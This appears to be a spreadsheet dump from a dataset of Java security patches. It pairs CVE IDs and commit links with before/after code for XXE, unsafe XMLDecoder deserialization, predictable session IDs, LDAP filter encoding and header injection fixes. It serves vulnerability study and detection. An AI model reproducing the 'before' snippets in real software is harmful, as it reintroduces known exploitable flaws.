    <t>The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.</t>
  </si>
  <si>
    <t>Software has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities.</t>
  </si>
  <si>
    <t>HttpHeadersBase.java</t>
  </si>
  <si>
    <t xml:space="preserve">import static com.google.common.base.Preconditions.checkArgument;
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
        final AsciiString normalizedName = normalizeName(name);
    private static AsciiString normalizeName(CharSequence name) {
        checkArgument(requireNonNull(name, "name").length() &gt; 0, "name is empty.");
        return HttpHeaderNames.of(name);
    }
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.BitSet;
import com.google.common.math.IntMath;
    private static final int PROHIBITED_VALUE_CHAR_MASK = ~15;
    private static final BitSet PROHIBITED_VALUE_CHARS = new BitSet(~PROHIBITED_VALUE_CHAR_MASK + 1);
    private static final String[] PROHIBITED_VALUE_CHAR_NAMES = new String[~PROHIBITED_VALUE_CHAR_MASK + 1];
    static {
        PROHIBITED_VALUE_CHARS.set(0);
        PROHIBITED_VALUE_CHARS.set('\n');
        PROHIBITED_VALUE_CHARS.set(0xB);
        PROHIBITED_VALUE_CHARS.set('\f');
        PROHIBITED_VALUE_CHARS.set('\r');
        PROHIBITED_VALUE_CHAR_NAMES[0] = "&lt;NUL&gt;";
        PROHIBITED_VALUE_CHAR_NAMES['\n'] = "&lt;LF&gt;";
        PROHIBITED_VALUE_CHAR_NAMES[0xB] = "&lt;VT&gt;";
        PROHIBITED_VALUE_CHAR_NAMES['\f'] = "&lt;FF&gt;";
        PROHIBITED_VALUE_CHAR_NAMES['\r'] = "&lt;CR&gt;";
    }
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        final AsciiString normalizedName = HttpHeaderNames.of(name);
        validateValue(value);
    private static void validateValue(String value) {
        final int valueLength = value.length();
        for (int i = 0; i &lt; valueLength; i++) {
            final char ch = value.charAt(i);
            if ((ch &amp; PROHIBITED_VALUE_CHAR_MASK) != 0) { // ch &gt;= 16
                continue;
            }
            // ch &lt; 16
            if (PROHIBITED_VALUE_CHARS.get(ch)) {
                throw new IllegalArgumentException(malformedHeaderValueMessage(value));
            }
        }
    }
    private static String malformedHeaderValueMessage(String value) {
        final StringBuilder buf = new StringBuilder(IntMath.saturatedAdd(value.length(), 64));
        buf.append("malformed header value: ");
        final int valueLength = value.length();
        for (int i = 0; i &lt; valueLength; i++) {
            final char ch = value.charAt(i);
            if (PROHIBITED_VALUE_CHARS.get(ch)) {
                buf.append(PROHIBITED_VALUE_CHAR_NAMES[ch]);
            } else {
                buf.append(ch);
            }
        }
        return buf.toString();
    }
</t>
  </si>
  <si>
    <t>ArmeriaHttpUtil.java</t>
  </si>
  <si>
    <t xml:space="preserve">            final AsciiString lowerCased = HttpHeaderNames.of(valuesIter.next()).toLowerCase();
</t>
  </si>
  <si>
    <t xml:space="preserve">            final AsciiString lowerCased = AsciiString.of(valuesIter.next()).toLowerCase();
</t>
  </si>
  <si>
    <t>CVE-2019-16941</t>
  </si>
  <si>
    <t>https://github.com/NationalSecurityAgency/ghidra/commit/a17728f8c12effa171b17a25ccfb7e7d9528c5d0</t>
  </si>
  <si>
    <t>DumpFunctionPatternInfoScript.java</t>
  </si>
  <si>
    <t>a17728f8c12effa171b17a25ccfb7e7d9528c5d0</t>
  </si>
  <si>
    <t xml:space="preserve">import java.beans.XMLEncoder;
		try (XMLEncoder xmlEncoder =
			new XMLEncoder(new BufferedOutputStream(new FileOutputStream(savedFile)))) {
			xmlEncoder.writeObject(funcPatternList);
		}
</t>
  </si>
  <si>
    <t xml:space="preserve">		funcPatternList.toXmlFile(savedFile);
</t>
  </si>
  <si>
    <t>Merge remote-tracking branch 'origin/GT-3198_dev747368_fix_XMLDecoder……_github_1090' into Ghidra_9.1</t>
  </si>
  <si>
    <t>ContextRegisterExtent.java</t>
  </si>
  <si>
    <t xml:space="preserve">			addRegisterAndValue(cRegInfo.getContextRegister(), cRegInfo.getValueAsBigInteger());
</t>
  </si>
  <si>
    <t xml:space="preserve">			addRegisterAndValue(cRegInfo.getContextRegister(), cRegInfo.getValue());
</t>
  </si>
  <si>
    <t>ContextRegisterFilter.java</t>
  </si>
  <si>
    <t xml:space="preserve">				if (!values.get(cInfo.getContextRegister()).equals(cInfo.getValueAsBigInteger())) {
</t>
  </si>
  <si>
    <t xml:space="preserve">				if (!values.get(cInfo.getContextRegister()).equals(cInfo.getValue())) {
</t>
  </si>
  <si>
    <t>ContextRegisterInfo.java</t>
  </si>
  <si>
    <t xml:space="preserve">	String value;//the value it assumes (needed because a BigInteger will not serialize to xml)
	BigInteger valueAsBigInteger;//the value it assumes
	/**
	 * Returns the value associated with this {@link ContextRegisterInfo} object as a 
	 * {@link BigInteger}.
	 * @return
	 */
	public BigInteger getValueAsBigInteger() {
		return valueAsBigInteger;
	}
	 * @param valueAsBigInteger
	public void setValue(BigInteger valueAsBigInteger) {
		this.valueAsBigInteger = valueAsBigInteger;
		this.value = valueAsBigInteger.toString();
	public String getValue() {
	/**
	 * Sets the value associated with this {@link ContextRegisterInfo} object
	 * @param value
	 */
	public void setValue(String value) {
		this.value = value;
		this.valueAsBigInteger = new BigInteger(value);
	}
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jdom.Element;
	static final String XML_ELEMENT_NAME = "ContextRegisterInfo";
	BigInteger value;//the value it assumes
	 * @param value
	public void setValue(BigInteger value) {
		this.value = value;
	public BigInteger getValue() {
	/**
	 * Creates a {@link ContextRegisterInfo} object using data in the supplied XML node.
	 * 
	 * @param ele xml Element
	 * @return new {@link ContextRegisterInfo} object, never null
	 */
	public static ContextRegisterInfo fromXml(Element ele) {
		String contextRegister = ele.getAttributeValue("contextRegister");
		String value = ele.getAttributeValue("value");
		ContextRegisterInfo result = new ContextRegisterInfo();
		result.setContextRegister(contextRegister);
		result.setValue(value != null ? new BigInteger(value) : null);
		return result;
	}
	/**
	 * Converts this object into XML
	 * 
	 * @return new jdom Element
	 */
	public Element toXml() {
		Element e = new Element(XML_ELEMENT_NAME);
		e.setAttribute("contextRegister", contextRegister);
		if (value != null) {
			e.setAttribute("value", value.toString());
		}
		return e;
	}
</t>
  </si>
  <si>
    <t>FileBitPatternInfo.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.*;
import org.jdom.*;
import org.jdom.input.SAXBuilder;
import ghidra.util.Msg;
import ghidra.util.xml.XmlUtilities;
	static final String XML_ELEMENT_NAME = "FileBitPatternInfo";
	/**
	 * Converts this object into XML
	 * 
	 * @return new jdom {@link Element}
	 */
	public Element toXml() {
		Element result = new Element(XML_ELEMENT_NAME);
		XmlUtilities.setStringAttr(result, "ghidraURL", ghidraURL);
		XmlUtilities.setStringAttr(result, "languageID", languageID);
		XmlUtilities.setIntAttr(result, "numFirstBytes", numFirstBytes);
		XmlUtilities.setIntAttr(result, "numFirstInstructions", numFirstInstructions);
		XmlUtilities.setIntAttr(result, "numPreBytes", numPreBytes);
		XmlUtilities.setIntAttr(result, "numPreInstructions", numPreInstructions);
		XmlUtilities.setIntAttr(result, "numReturnBytes", numReturnBytes);
		XmlUtilities.setIntAttr(result, "numReturnInstructions", numReturnInstructions);
		Element funcBitPatternInfoListEle = new Element("funcBitPatternInfoList");
		for (FunctionBitPatternInfo fbpi : funcBitPatternInfo) {
			funcBitPatternInfoListEle.addContent(fbpi.toXml());
		}
		result.addContent(funcBitPatternInfoListEle);
		return result;
	}
	/**
	 * Creates a {@link FileBitPatternInfo} instance from XML.
	 * 
	 * @param e XML element to convert
	 * @return new {@link FileBitPatternInfo}, never null
	 * @throws IOException if file IO error or xml data problem
	 */
	public static FileBitPatternInfo fromXml(Element e) throws IOException {
		String ghidraURL = e.getAttributeValue("ghidraURL");
		String languageID = e.getAttributeValue("languageID");
		int numFirstBytes =
			XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numFirstBytes"));
		int numFirstInstructions =
			XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numFirstInstructions"));
		int numPreBytes = XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numPreBytes"));
		int numPreInstructions =
			XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numPreInstructions"));
		int numReturnBytes =
			XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numReturnBytes"));
		int numReturnInstructions =
			XmlUtilities.parseInt(XmlUtilities.requireStringAttr(e, "numReturnInstructions"));
		List&lt;FunctionBitPatternInfo&gt; funcBitPatternInfoList = new ArrayList&lt;&gt;();
		Element funcBitPatternInfoListEle = e.getChild("funcBitPatternInfoList");
		if (funcBitPatternInfoListEle != null) {
			for (Element childElement : XmlUtilities.getChildren(funcBitPatternInfoListEle,
				FunctionBitPatternInfo.XML_ELEMENT_NAME)) {
				funcBitPatternInfoList.add(FunctionBitPatternInfo.fromXml(childElement));
			}
		}
		FileBitPatternInfo result = new FileBitPatternInfo();
		result.setFuncBitPatternInfo(funcBitPatternInfoList);
		result.setGhidraURL(ghidraURL);
		result.setLanguageID(languageID);
		result.setNumFirstBytes(numFirstBytes);
		result.setNumFirstInstructions(numFirstInstructions);
		result.setNumPreBytes(numPreBytes);
		result.setNumPreInstructions(numPreInstructions);
		result.setNumReturnBytes(numReturnBytes);
		result.setNumReturnInstructions(numReturnInstructions);
		return result;
	}
	/**
	 * Converts this object to XML and writes it to the specified file.
	 * 
	 * @param destFile name of xml file to create
	 * @throws IOException if file io error
	 */
	public void toXmlFile(File destFile) throws IOException {
		Element rootEle = toXml();
		Document doc = new Document(rootEle);
		XmlUtilities.writePrettyDocToFile(doc, destFile);
	}
	/**
	 * Creates a {@link FileBitPatternInfo} instance from a XML file.
	 * 
	 * @param inputFile name of xml file to read
	 * @return new {@link FileBitPatternInfo} instance, never null
	 * @throws IOException if file io error or xml data format problem 
	 */
	public static FileBitPatternInfo fromXmlFile(File inputFile) throws IOException {
		SAXBuilder sax = XmlUtilities.createSecureSAXBuilder(false, false);
		try (InputStream fis = new FileInputStream(inputFile)) {
			Document doc = sax.build(fis);
			Element rootElem = doc.getRootElement();
			return fromXml(rootElem);
		}
		catch (JDOMException | IOException e) {
			Msg.error(FileBitPatternInfo.class, "Bad file bit pattern file " + inputFile, e);
			throw new IOException("Failed to read file bit pattern " + inputFile, e);
		}
	}
</t>
  </si>
  <si>
    <t>FileBitPatternInfoReader.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.beans.XMLDecoder;
		try (XMLDecoder xmlDecoder = new XMLDecoder(new FileInputStream(dataFile))) {
			fileInfo = (FileBitPatternInfo) xmlDecoder.readObject();
		}
		catch (ArrayIndexOutOfBoundsException e) {
			// Probably wrong type of XML file...skip
			Msg.error(this, "IOException", e);
		}
		if (fileInfo == null) {
			Msg.info(this, "null FileBitPatternInfo for " + dataFile);
</t>
  </si>
  <si>
    <t xml:space="preserve">		try {
			fileInfo = FileBitPatternInfo.fromXmlFile(dataFile);
			Msg.error(this, "Error reading FileBitPatternInfo file " + dataFile, e);
</t>
  </si>
  <si>
    <t>CVE-2019-17091</t>
  </si>
  <si>
    <t>https://github.com/eclipse-ee4j/mojarra/commit/8f70f2bd024f00ecd5b3dcca45df73edda29dcee</t>
  </si>
  <si>
    <t>PartialViewContextImpl.java</t>
  </si>
  <si>
    <t>8f70f2bd024f00ecd5b3dcca45df73edda29dcee</t>
  </si>
  <si>
    <t xml:space="preserve">            writer.write(window.getId());
</t>
  </si>
  <si>
    <t xml:space="preserve">            writer.writeText(window.getId(), null);
</t>
  </si>
  <si>
    <t>Merge pull request #4567 from ruolli/Issue_4556Fixes #4556 : HIGH-LEVEL VULNERABILITY WITHIN MOJARRA JSF V2.2</t>
  </si>
  <si>
    <t>https://github.com/eclipse-ee4j/mojarra/commit/a3fa9573789ed5e867c43ea38374f4dbd5a8f81f</t>
  </si>
  <si>
    <t>a3fa9573789ed5e867c43ea38374f4dbd5a8f81f</t>
  </si>
  <si>
    <t>Fixes #4556 : HIGH-LEVEL VULNERABILITY WITHIN MOJARRA JSF V2.2</t>
  </si>
  <si>
    <t>CVE-2019-3559</t>
  </si>
  <si>
    <t>https://github.com/facebook/fbthrift/commit/a56346ceacad28bf470017a6bda1d5518d0bd943</t>
  </si>
  <si>
    <t>TProtocolUtil.java</t>
  </si>
  <si>
    <t>a56346ceacad28bf470017a6bda1d5518d0bd943</t>
  </si>
  <si>
    <t xml:space="preserve">      break;
</t>
  </si>
  <si>
    <t xml:space="preserve">      {
        throw new TProtocolException(
              TProtocolException.INVALID_DATA, "Invalid type encountered during skipping: " + type);
      }
</t>
  </si>
  <si>
    <t>Throw on bad types during skipping dataSummary:
The current code silently returns on bad types. In case when we have an invalid data, we may get a container of a large size with a bad type, this would lead to us running long loop doing nothing (though we already can say that the data is invalid).
The new code would throw an exception as soon as we try to skip a value of invalid type.
Fixes CVE-2019-3552
Reviewed By: stevegury
Differential Revision: D13892370
fbshipit-source-id: 582c81f90cf40c105383083cb38815816140e3ad</t>
  </si>
  <si>
    <t>CVE-2015-1169</t>
  </si>
  <si>
    <t>https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c</t>
  </si>
  <si>
    <t>LdapUtils.java</t>
  </si>
  <si>
    <t>7de61b4c6244af9ff8e75a2c92a570f3b075309c</t>
  </si>
  <si>
    <t xml:space="preserve">            final String value = LdapEncoder.nameEncode(properties.get(key));
</t>
  </si>
  <si>
    <t xml:space="preserve">            final String value = LdapEncoder.filterEncode(properties.get(key));
</t>
  </si>
  <si>
    <t>Merge pull request #411 from serac/CAS-1429-ldap-filter-encodingCAS-1429 Escape inputs into LDAP filter expressions.</t>
  </si>
  <si>
    <t>CVE-2015-1849</t>
  </si>
  <si>
    <t>https://github.com/wildfly-security/jboss-negotiation/commit/0dc9d191b6eb1d13b8f0189c5b02ba6576f4722e</t>
  </si>
  <si>
    <t>AdvancedLdapLoginModule.java</t>
  </si>
  <si>
    <t>0dc9d191b6eb1d13b8f0189c5b02ba6576f4722e</t>
  </si>
  <si>
    <t xml:space="preserve">         if (credentials != null &amp;&amp; credentials.length() &gt; 0)
            tmp.setProperty(Context.SECURITY_CREDENTIALS, "***");
         if (bindCredential != null &amp;&amp; bindCredential.length() &gt; 0)
             tmp.setProperty(BIND_CREDENTIAL, "***");
</t>
  </si>
  <si>
    <t xml:space="preserve">         if (credentials != null &amp;&amp; credentials.length() &gt; 0) {
        	 tmp.setProperty(Context.SECURITY_CREDENTIALS, "***");
         }
         if (bindCredential != null &amp;&amp; bindCredential.length() &gt; 0) {
        	 tmp.setProperty(BIND_CREDENTIAL, "***");
         }
</t>
  </si>
  <si>
    <t>SECURITY-877</t>
  </si>
  <si>
    <t>CVE-2015-2913</t>
  </si>
  <si>
    <t>https://github.com/orientechnologies/orientdb/commit/668ece96be210e742a4e2820a3085b215cf55104</t>
  </si>
  <si>
    <t>OHttpSessionManager.java</t>
  </si>
  <si>
    <t>668ece96be210e742a4e2820a3085b215cf55104</t>
  </si>
  <si>
    <t xml:space="preserve">    *
    *  *  Copyright 2014 Orient Technologies LTD (info(at)orientechnologies.com)
    *  *
    *  *  Licensed under the Apache License, Version 2.0 (the "License");
    *  *  you may not use this file except in compliance with the License.
    *  *  You may obtain a copy of the License at
    *  *
    *  *       http://www.apache.org/licenses/LICENSE-2.0
    *  *
    *  *  Unless required by applicable law or agreed to in writing, software
    *  *  distributed under the License is distributed on an "AS IS" BASIS,
    *  *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    *  *  See the License for the specific language governing permissions and
    *  *  limitations under the License.
    *  *
    *  * For more information: http://www.orientechnologies.com
    *
    */
 import com.orientechnologies.common.log.OLogManager;
 import com.orientechnologies.orient.core.Orient;
 import com.orientechnologies.orient.core.config.OGlobalConfiguration;
 import java.util.HashMap;
 import java.util.Iterator;
 import java.util.Map;
 import java.util.Map.Entry;
 import java.util.Random;
 import java.util.TimerTask;
  * Handles the HTTP sessions such as a real HTTP Server.
  *
  * @author Luca Garulli
  */
 public class OHttpSessionManager extends OSharedResourceAbstract {
   private static final OHttpSessionManager instance = new OHttpSessionManager();
   private Map&lt;String, OHttpSession&gt;        sessions = new HashMap&lt;String, OHttpSession&gt;();
   private int                              expirationTime;
   private Random                           random   = new Random();
   protected OHttpSessionManager() {
     expirationTime = OGlobalConfiguration.NETWORK_HTTP_SESSION_EXPIRE_TIMEOUT.getValueAsInteger() * 1000;
     Orient.instance().scheduleTask(new TimerTask() {
       @Override
       public void run() {
         final int expired = checkSessionsValidity();
         if (expired &gt; 0)
           OLogManager.instance().debug(this, "Removed %d session because expired", expired);
       }
     }, expirationTime, expirationTime);
   }
   public int checkSessionsValidity() {
     int expired = 0;
     acquireExclusiveLock();
     try {
       final long now = System.currentTimeMillis();
       Entry&lt;String, OHttpSession&gt; s;
       for (Iterator&lt;Map.Entry&lt;String, OHttpSession&gt;&gt; it = sessions.entrySet().iterator(); it.hasNext();) {
         s = it.next();
         if (now - s.getValue().getUpdatedOn() &gt; expirationTime) {
           // REMOVE THE SESSION
           it.remove();
           expired++;
         }
       }
     } finally {
       releaseExclusiveLock();
     }
     return expired;
   }
   public OHttpSession[] getSessions() {
     acquireSharedLock();
     try {
       return (OHttpSession[]) sessions.values().toArray(new OHttpSession[sessions.size()]);
     } finally {
       releaseSharedLock();
     }
   }
   public OHttpSession getSession(final String iId) {
     acquireSharedLock();
     try {
       final OHttpSession sess = sessions.get(iId);
       if (sess != null)
         sess.updateLastUpdatedOn();
       return sess;
     } finally {
       releaseSharedLock();
     }
   }
   public String createSession(final String iDatabaseName, final String iUserName, final String iUserPassword) {
     acquireExclusiveLock();
     try {
       final String id = "OS" + System.currentTimeMillis() + random.nextLong();
       sessions.put(id, new OHttpSession(id, iDatabaseName, iUserName, iUserPassword));
       return id;
     } finally {
       releaseExclusiveLock();
     }
   }
   public OHttpSession removeSession(final String iSessionId) {
     acquireExclusiveLock();
     try {
       return sessions.remove(iSessionId);
     } finally {
       releaseExclusiveLock();
     }
   }
   public int getExpirationTime() {
     return expirationTime;
   }
   public void setExpirationTime(int expirationTime) {
     this.expirationTime = expirationTime;
   }
   public static OHttpSessionManager getInstance() {
     return instance;
   }
 }
</t>
  </si>
  <si>
    <t xml:space="preserve"> *
 *  *  Copyright 2014 Orient Technologies LTD (info(at)orientechnologies.com)
 *  *
 *  *  Licensed under the Apache License, Version 2.0 (the "License");
 *  *  you may not use this file except in compliance with the License.
 *  *  You may obtain a copy of the License at
 *  *
 *  *       http://www.apache.org/licenses/LICENSE-2.0
 *  *
 *  *  Unless required by applicable law or agreed to in writing, software
 *  *  distributed under the License is distributed on an "AS IS" BASIS,
 *  *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *  *  See the License for the specific language governing permissions and
 *  *  limitations under the License.
 *  *
 *  * For more information: http://www.orientechnologies.com
 *
 */
import com.orientechnologies.common.log.OLogManager;
import com.orientechnologies.orient.core.Orient;
import com.orientechnologies.orient.core.config.OGlobalConfiguration;
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Random;
import java.util.TimerTask;
 * Handles the HTTP sessions such as a real HTTP Server.
 *
 * @author Luca Garulli
 */
public class OHttpSessionManager extends OSharedResourceAbstract {
  private static final OHttpSessionManager instance = new OHttpSessionManager();
  private Map&lt;String, OHttpSession&gt;        sessions = new HashMap&lt;String, OHttpSession&gt;();
  private int                              expirationTime;
  private Random                           random   = new SecureRandom();
  protected OHttpSessionManager() {
    expirationTime = OGlobalConfiguration.NETWORK_HTTP_SESSION_EXPIRE_TIMEOUT.getValueAsInteger() * 1000;
    Orient.instance().scheduleTask(new TimerTask() {
      @Override
      public void run() {
        final int expired = checkSessionsValidity();
        if (expired &gt; 0)
          OLogManager.instance().debug(this, "Removed %d session because expired", expired);
      }
    }, expirationTime, expirationTime);
  }
  public int checkSessionsValidity() {
    int expired = 0;
    acquireExclusiveLock();
    try {
      final long now = System.currentTimeMillis();
      Entry&lt;String, OHttpSession&gt; s;
      for (Iterator&lt;Map.Entry&lt;String, OHttpSession&gt;&gt; it = sessions.entrySet().iterator(); it.hasNext();) {
        s = it.next();
        if (now - s.getValue().getUpdatedOn() &gt; expirationTime) {
          // REMOVE THE SESSION
          it.remove();
          expired++;
        }
      }
    } finally {
      releaseExclusiveLock();
    }
    return expired;
  }
  public OHttpSession[] getSessions() {
    acquireSharedLock();
    try {
      return (OHttpSession[]) sessions.values().toArray(new OHttpSession[sessions.size()]);
    } finally {
      releaseSharedLock();
    }
  }
  public OHttpSession getSession(final String iId) {
    acquireSharedLock();
    try {
      final OHttpSession sess = sessions.get(iId);
      if (sess != null)
        sess.updateLastUpdatedOn();
      return sess;
    } finally {
      releaseSharedLock();
    }
  }
  public String createSession(final String iDatabaseName, final String iUserName, final String iUserPassword) {
    acquireExclusiveLock();
    try {
      final String id = "OS" + System.currentTimeMillis() + random.nextLong();
      sessions.put(id, new OHttpSession(id, iDatabaseName, iUserName, iUserPassword));
      return id;
    } finally {
      releaseExclusiveLock();
    }
  }
  public OHttpSession removeSession(final String iSessionId) {
    acquireExclusiveLock();
    try {
      return sessions.remove(iSessionId);
    } finally {
      releaseExclusiveLock();
    }
  }
  public int getExpirationTime() {
    return expirationTime;
  }
  public void setExpirationTime(int expirationTime) {
    this.expirationTime = expirationTime;
  }
  public static OHttpSessionManager getInstance() {
    return instance;
  }
}
</t>
  </si>
  <si>
    <t>Adopted SecureRandom to avoid predicable random numbers in session</t>
  </si>
  <si>
    <t>CVE-2015-3208</t>
  </si>
  <si>
    <t>https://github.com/apache/activemq-artemis/commit/48d9951d879e0c8cbb59d4b64ab59d53ef88310d</t>
  </si>
  <si>
    <t>XalanXPathEvaluator.java</t>
  </si>
  <si>
    <t>48d9951d879e0c8cbb59d4b64ab59d53ef88310d</t>
  </si>
  <si>
    <t xml:space="preserve">         DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
         factory.setNamespaceAware(true);
         DocumentBuilder dbuilder = factory.newDocumentBuilder();
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.parsers.ParserConfigurationException;
         DocumentBuilder dbuilder = createDocumentBuilder();
   private DocumentBuilder createDocumentBuilder() throws ParserConfigurationException
   {
      DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
      factory.setNamespaceAware(true);
      factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
      factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
      factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      return factory.newDocumentBuilder();
   }
</t>
  </si>
  <si>
    <t>ActiveMQ6-112 Add defaults to the selector parser doc builder</t>
  </si>
  <si>
    <t>CVE-2015-5377</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/commit/bf3052d14c874aead7da8855c5fcadf5428a43f2</t>
  </si>
  <si>
    <t>ThrowableObjectInputStream.java</t>
  </si>
  <si>
    <t>bf3052d14c874aead7da8855c5fcadf5428a43f2</t>
  </si>
  <si>
    <t xml:space="preserve">                return super.readClassDescriptor();
                return ObjectStreamClass.lookup(clazz);
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.fasterxml.jackson.core.JsonLocation;
import com.google.common.collect.ImmutableMap;
import org.elasticsearch.common.collect.IdentityHashSet;
import org.joda.time.DateTimeFieldType;
import java.net.*;
import java.util.*;
                return verify(super.readClassDescriptor());
                return verify(ObjectStreamClass.lookup(clazz));
    private static final Set&lt;Class&lt;?&gt;&gt; CLASS_WHITELIST;
    private static final Set&lt;Package&gt; PKG_WHITELIST;
    static {
        IdentityHashSet&lt;Class&lt;?&gt;&gt; classes = new IdentityHashSet&lt;&gt;();
        classes.add(String.class);
        // inet stuff is needed for DiscoveryNode
        classes.add(Inet6Address.class);
        classes.add(Inet4Address.class);
        classes.add(InetAddress.class);
        classes.add(InetSocketAddress.class);
        classes.add(SocketAddress.class);
        classes.add(StackTraceElement.class);
        classes.add(JsonLocation.class); // JsonParseException uses this
        IdentityHashSet&lt;Package&gt; packages = new IdentityHashSet&lt;&gt;();
        packages.add(Integer.class.getPackage()); // java.lang
        packages.add(List.class.getPackage()); // java.util
        packages.add(ImmutableMap.class.getPackage()); // com.google.common.collect
        packages.add(DateTimeFieldType.class.getPackage()); // org.joda.time
        CLASS_WHITELIST = Collections.unmodifiableSet(classes);
        PKG_WHITELIST = Collections.unmodifiableSet(packages);
    }
    private ObjectStreamClass verify(ObjectStreamClass streamClass) throws IOException, ClassNotFoundException {
        Class&lt;?&gt; aClass = resolveClass(streamClass);
        Package pkg = aClass.getPackage();
        if (aClass.isPrimitive() // primitives are fine
                || aClass.isArray() // arrays are ok too
                || Throwable.class.isAssignableFrom(aClass)// exceptions are fine
                || CLASS_WHITELIST.contains(aClass) // whitelist JDK stuff we need
                || PKG_WHITELIST.contains(aClass.getPackage())
                || pkg.getName().startsWith("org.elasticsearch")) { // es classes are ok
            return streamClass;
        }
        throw new NotSerializableException(aClass.getName());
    }
</t>
  </si>
  <si>
    <t>Restrict Exception deserialization to Core and JDK classeswhen 3rd party exceptions are deserialized they might carry
classes not present on the deserializing node. This causes hard
exceptions and looses the exception entirely. This commit restricts
the classes we support for deserialization for core and selected JDK
classes to guarantee they are present on both source and target nodes</t>
  </si>
  <si>
    <t>ThrowableObjectOutputStream.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.*;
    /**
     * Simple helper method to roundtrip a serializable object within the ThrowableObjectInput/Output stream
     */
    public static &lt;T extends Serializable&gt; T serialize(T t) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream stream = new ByteArrayOutputStream();
        try (ThrowableObjectOutputStream outputStream = new ThrowableObjectOutputStream(stream)) {
            outputStream.writeObject(t);
        }
        try (ThrowableObjectInputStream in = new ThrowableObjectInputStream(new ByteArrayInputStream(stream.toByteArray()))) {
            return (T) in.readObject();
        }
    }
    /**
     * Returns &lt;code&gt;true&lt;/code&gt; iff the exception can be serialized and deserialized using
     * {@link ThrowableObjectOutputStream} and {@link ThrowableObjectInputStream}. Otherwise &lt;code&gt;false&lt;/code&gt;
     */
    public static boolean canSerialize(Throwable t) {
        try {
            serialize(t);
            return true;
        } catch (Throwable throwable) {
            return false;
        }
    }
</t>
  </si>
  <si>
    <t>LocalTransportChannel.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if (ThrowableObjectOutputStream.canSerialize(error) == false) {
            assert false : "Can not serialize exception: " + error; // make sure tests fail
            error = new NotSerializableTransportException(error);
        }
</t>
  </si>
  <si>
    <t>NettyTransportChannel.java</t>
  </si>
  <si>
    <t>CVE-2015-7326</t>
  </si>
  <si>
    <t>https://github.com/miltonio/milton2/commit/5f81b0c48a817d4337d8b0e99ea0b4744ecd720b</t>
  </si>
  <si>
    <t>DefaultPropFindRequestFieldParser.java</t>
  </si>
  <si>
    <t>5f81b0c48a817d4337d8b0e99ea0b4744ecd720b</t>
  </si>
  <si>
    <t xml:space="preserve">        try {            
            }            
</t>
  </si>
  <si>
    <t xml:space="preserve">        try {
				// https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
				reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
				reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
            }
</t>
  </si>
  <si>
    <t>patch XXE vulnerability</t>
  </si>
  <si>
    <t>DefaultPropPatchParser.java</t>
  </si>
  <si>
    <t xml:space="preserve">			// https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
			reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
			reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
</t>
  </si>
  <si>
    <t>https://github.com/miltonio/milton2/commit/b41072b</t>
  </si>
  <si>
    <t>OAuth2Helper.java</t>
  </si>
  <si>
    <t>b41072b</t>
  </si>
  <si>
    <t xml:space="preserve">		String scopes = Utils.toCsv(provider.getPermissionScopes());
</t>
  </si>
  <si>
    <t xml:space="preserve">		String scopes = Utils.toCsv(provider.getPermissionScopes(), false);
</t>
  </si>
  <si>
